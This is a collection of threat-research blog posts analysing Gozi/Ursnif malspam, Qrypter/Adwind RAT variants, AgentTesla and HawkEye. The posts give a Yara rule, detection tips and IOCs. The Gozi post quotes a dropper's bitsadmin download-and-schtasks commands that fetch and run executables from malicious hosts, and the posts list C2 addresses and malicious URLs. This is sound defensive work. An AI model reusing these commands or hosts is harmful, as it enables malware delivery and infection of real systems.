Hunting malware in memory. A Gozi case.

Some of the actors using Gozi / Ursnif take advantage of compromised emails (BEC) to deliver weaponised Microsoft Office documents. This is not new at all, however in the last week I've seen an increase of such attacks. In recent campaigns, the office document contains a macro which spawn a cmd.exe which executes a PowerShell to download the payload.

This could be easily detected with any end-point use case which monitors processes and parent processes.

Also, Gozi can be easily detected via the registry keys as the malware itself is stored there.

The dropped payload from this Gozi version executes some unique  PowerShell command in order to persist in the registry key, which can be easily hunt:

Some endpoints solutions have the capability to run searches against Yara rules. In some cases the searches can cover running processes, live memory and specific files within a given folder. A good example is the open source project malscan which permits to scan process in memory. This is really an interesting way to detect malware in end-points.

For details on how Gozi works, there is a good post from Vitali Kremez explaining how recent versions of Gozi works.  In essence, Gozi injects a DLL (client.dll) in the explorer.exe process so it is possible to hunt for the URL C2 strings in this process. I already extracted the URL C2 strings in some past blog entry 

rule gozi_C2_memory {
     meta:
      description = "Gozi C2 memory"
      author = "@Angelill0 -  Angel Alonso Parrizas"
      date = "2018-11-19"

   strings:
      
        $s1 = /soft=\S+&version=\S+&user=\S+&server=\S+&id=\S+/  // Gozi V2
        $s2 = /soft=\S+&user=\S+&server=\S+&id=\S+/ // Gozi V2
        $s3 = /soft=\S+&version=\S+&user=\S+&group=\S+&id=\S+/  //Gozi V3

   condition:
        $s1 or $s2 or  $s3

}

Running the Yara rule against an infected system, it is possible to detect the C2 in memory:

Gozi malspam campaign mimicking Swisscom on 30th July 2018

A few days ago GovCERT.ch informed via twitter about a malspam campaign mimicking Swisscom invoices.

The malware delivered in the latest stage was Gozi / Ursnif. But let's analyse a bit this campaign.

The malspam campaign is based on e-mails mimicking invoices from the telco Swisscom and with a HTTP link to a ZIP file. The ZIP files contains an obfuscated Visual Basic Script (VBS)



The VBS was not detected by many AV:



The script executed the following commands:

C:\Windows\System32\cmd.exe' /c bitsadmin /transfer mxs5 https://bestouters.com/online/docker.php2 C:\Users\user~1\AppData\Local\Temp/JZCzDJTTgS.exe &

bitsadmin /create /download IUII &bitsadmin /addfile IUII https://bestouters.com/online/index.php C:\Users\user~1\AppData\Local\Temp/oXzEXmPNy.txt &

bitsadmin /setcustomheaders IUII User-Agent:STARLEX &

bitsadmin /resume IUII &bitsadmin /complete IUII &

schtasks /create /st 17:10 /sc once /tn sw3 /tr C:\Users\user~1\AppData\Local\Temp/JZCzDJTTgS.exe

It is interesting to see how the command 'bitsadmin' is used to drop the payload from " https://bestouters.com/online/docker.php" . This technique is well known to be used by malware so it is a must to monitor such process, for example via Sysmon.
Also, the fact that the user-agent is setup to "STARLEX" makes this campaign unique, however, looking to the network traffic, it seems that this never worked and it used the default bitsadmin user-agent:

In any case, monitoring the user agent either for strange names or "Microsoft BITS" will provide good insight about suspicious activity.
The last two steps are related to the schedule task created via "schtasks" command. This is a good technique to delay automatic malware sandbox analysis, but it is also very easy to detect via proper detection use cases. Two things here can be monitored: the command "schtasks /create" and the fact that a binary under the "AppData" folder is called. Generally talking there should not be binaries being called from *AppData* as this is also a suspicious activity.

Clearly, this Gozi campaign was very noisy and easy to detect with some basic use cases.

Regarding the analysis of the Gozi binary dropped, there are a couple o interesting things. First, it was signed with a valid certificate:





And this same certificate was used to sign other Gozi binary used in other campaign in other country the same day. 

Secondly, it seems the malware had some debug code enabled which showed the version of the code (version 3 build 613)




The last point is that this version of Gozi/URsnif seems to be based on this leak ISFB source code on account that the DGA CRC matches '0x4eb7d2ca' together with the DGA base URL "http://constitution.org/usdeclar.txt"







However this version of Gozi is not using the DGA feature,  but the URL acting as C2 https://bybybaby.top is hardcoded

qthelegend: the new Qrypter for Adwind

Since last December, when I blogged  the first time about Qrypter, I've been tracking Adwind malware using this service. 

@abuse.ch wrote a very interesting post about the providers hosting the C2 infrastructure which is being used by malware encrypted with Qrypter.


Since a few weeks Qrypter has migrated to a new platform and doesn't use Tor any more












The new version of Qrypter uses a Java application running locally, which encrypts the files.



In order to use the application, the user must be registered and buy a license  (credits). 






I wanted to check if there is any substantial change in how the malware is encrypted with the service, hence I took a look to a recent sample. The behaviour analysis doesn't really show any difference. 





While debugging the malware  I can see the different Java processes executed until the final payload is decrypted and executed



In the end the configuration for the command and controlled is obtained the same way than with previous Qrypter version






During the analysis process, I can see the typical Adwind behaviour executing VB scripts for checking AV installed, local firewall and making itself persistent via the registry













Qthelegend, the new Qrypter, has not really change in terms of how the malware is encrypted.

Inside Qarallax / Adwind / Qrypter leading to Tesla / HawkEye (part 1)

A few months ago I wrote about some Java RAT named QRypter (aka QRat or Qarallax) which is basically Adwind with some layers of obfuscation. The post is here.

Usually, this RAT is used as first stage of the infection. In a second stage additional payload is deployed in the victim. But before I explain this, let's take a look to the capabilities of this QRypter / Adwind.

This RAT written in Java is multiplatform. As it can be seen in the screenshot below is full of functionalities.  

The basic options permits to have full visibility and take control on the victims's file system, processes, connections, etc

But besides that, there are more advance functionalities like capture the webcam, access via Remote Desktop, remote console, retrieve stored password, capture the microphone, key logger, SOCKS proxy, retrieve the data from wallets, etc.

For each of the functionalities, there is an existing module. The modules are original from JBifrost malware, so clearly this is based on JBifrost malware.

Also, the remote console is based on JBifrost

The remote desktop functionality permits also to add new users

But, if all this features are not enough, there is also the possibility to automatically download any additional payload once the victims connects to the C2. This allows to deploy any additional payload to the victims without any interaction in the C2

 

Actually, lot of AgentTesla and HawkEye are being deployed this way.

So, let's talk about a bit AgentTesla and HawkEye

This two families of malware are very close in terms of capabilities and are used by threat actors which operate with similar TTPs. 

HawkEye and AgentTesla main target is to take screenshots of the victims, dump all the passwords stored in different programs (Outlook, browser, etc) and dump all the historical of cute&paste / keylog done in the system. The data is exfiltrated either via HTTP or via mail.

The first thing that happens, after a victim is infected via HawkEye, is that the threat actor receives an email informing that there is a new infection. This is a "Execution Confirmed" message. The content of such data is quite interesting as it contains information about the system, including the name of the file which was the infection vector, the private IP of the system the time frame to log and the functionality enabled.

On the other hand, AgentTesla already provides some data exfiltrated with information about the victim and screenshots in the first email. This is  "screen capture"

HawEye  provides 2 other messages: "stealer records" and "keylog records". The first one is password dumps,  while the second one is all the information recorded in the clipboard and a screenshot

AgentTesla sends two additional set of data: "Keystrokes" and "password recovered".

(To be continued)

The strange case of Adwind embedded in a MS-DOS file

A few days ago there was a malspam campaign mimicking one bank and delivering a PDF file and some DOC files exploiting CVE-2017-11882










The PDF file contains several images and and two interesting URLs





The first URL, http://dropboox[.]ga clearly is a phishing link for Dropbox, however in this case it is not being used.

The other link, is still active by the time of writing this post, https://urlz[.]fr/6DWd,  redirects to http://mineralsconventionregistration[.]ca/Scann%20copy.z which it is a compressed file. In VT this file is being flagged: https://www.virustotal.com/#/file/670bca12bb20921b4689bb2651a8cc7b87840f31dbf729694027db4fb64e3296/detection




The first time I tried to detonate the file in several sandboxes it did not work, so I was interesting to understand a bit more. The file inside has .JAR extension, however the magic number for this file doesn't really correspond with the extension of the file, as it is MS-DOS




A first analysis of the file shows interesting things.  The beginning of the file is a MS-DOS file:


However, it contains several more files inside:




The analysis from previous tools seems is not accurate as one of the MS-DOS file has 7.2MB, however the total file is only around 800k. Checking with other tools, the analysis is different, for example, with foremost the MS-DOS files doesn't show





When unzipping the the .jar file, there is some warning :




I did a manual analysis on the file and as first look I even see some HTML, PHP and JavaScript code, right after the first MS-DOS code




When dumping the first PHP file, the content clearly is a phishing website to get passwords from email.




Then I forced my sandbox to detonate the file as JAR file, and ignoring the magic number, this worked and I could see they typical Adwind behaviour.








The connection to the Jrat C&C is 185.29.10.138:6060  (jrat138.duckdns.org). That IP is not new to me, as I have seen this IP linked to Qrat / Qrypter / Adwind in some analysis I i did in the past . 

As I said in the beginning, the file doesn't detonate in some sandboxes, due to how it is built. For example, this is the analysis from HA with no detonation

https://www.hybrid-analysis.com/sample/94f087e4f03d4c109db44e9c111e8a4c500ef619ccb5a4833b283495b9ecb23e?environmentId=100
Other sandboxes, detects that the extension doesn't match the magic number




Regarding the AV, it seems some of them detectes the HTML, in the beginning of the file, as phishing. While other detect it as Adwind




The behavior of the DOC files is very similar. However, instead of including the URLs in the PDF file,  CVE-2017-11882 is exploited to download the maliciuos file:




http://mineralsconventionregistration[.]ca/scan.hta

In the end, the final payload is exactly the same in bot cases, however the URL is not exactly the same:

http://mineralsconventionregistration[.]ca/scan.jar





Regardless of what the AV / Sandboxes detect, and what the magic number is,  when the user opens the file via the explorer, the file is executed like a normal Java file, hence it gets infected with Adwind. It seems that bad guys are trying with this techniques to by-pass some detection controls.


IOCs:

 http://dropboox[.]ga
185.29.10.138:6060  
jrat138.duckdns[.]org
http://mineralsconventionregistration[.]ca/scan.jar
http://mineralsconventionregistration[.]ca/scan.hta
1540f31ed4c2a721771dbc452b8feeaa
a9122eb1e0345568540ae6a9e35432cc
1540f31ed4c2a721771dbc452b8feeaa